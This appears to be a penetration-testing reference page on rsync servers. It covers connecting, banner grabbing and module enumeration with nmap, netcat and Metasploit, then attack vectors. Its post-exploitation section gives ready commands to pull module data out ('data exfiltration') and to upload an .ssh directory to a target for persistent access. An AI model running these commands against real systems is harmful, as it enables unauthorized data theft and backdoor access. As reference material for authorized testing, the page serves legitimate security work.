Skip to main content

Rsync

Default Port: 873

Connect

To initiate a connection with an rsync server, use the rsync command followed by the rsync URL.

The URL format is `[rsync://][user@]host[:port]/module.``

rsync rsync://user@target_host/

Enumeration

Identifying an Rsync Server

You can use Nmap to check if there's an Rsync server on a target host like this:

nmap -p 873 X.X.X.X

You can use Netcat to find out what service is running and its version by looking at the welcome message it shows when you connect. This method is called Banner Grabbing.

nc -nv X.X.X.X 873

# Expected output format
@RSYNCD: version

Enumerate Modules

Enumeration is crucial in understanding the structure of the target rsync module and finding misconfigurations or sensitive information.

Using nmap

nmap -sV --script "rsync-list-modules" -p 873 target_host

Using Metasploit

msf> use auxiliary/scanner/rsync/modules_list

Enumerate Shared Folders

Rsync modules represent directory shares and may be protected with a password. To list these modules:

rsync target_host::

For detailed enumeration of a specific module to see files and permissions:

rsync -av --list-only rsync://target_host/module_name

Attack Vectors

Misconfigured Modules

Modules without proper authentication can be accessed by unauthorized users. This vulnerability allows attackers to read, modify, or delete sensitive data.

If a module is writable, and you have determined its path through enumeration, you can upload malicious files, potentially leading to remote command execution or pivoting into the network.

Outdated Rsync Version

Old versions of rsync may contain vulnerabilities that can be exploited. Use tools like nmap with version detection to identify if the target is running an outdated rsync version.

nmap -sV --script=rsync-list-modules target_host

Post-Exploitation

Data Exfiltration

Sensitive data identified during enumeration can be exfiltrated using rsync:

rsync -avz target_host::module_name /local/directory/

Gain Persistent Access

Upload artifacts like modified scripts or binaries to maintain access:

rsync -av home_user/.ssh/ rsync://user@target_host/home_user/.ssh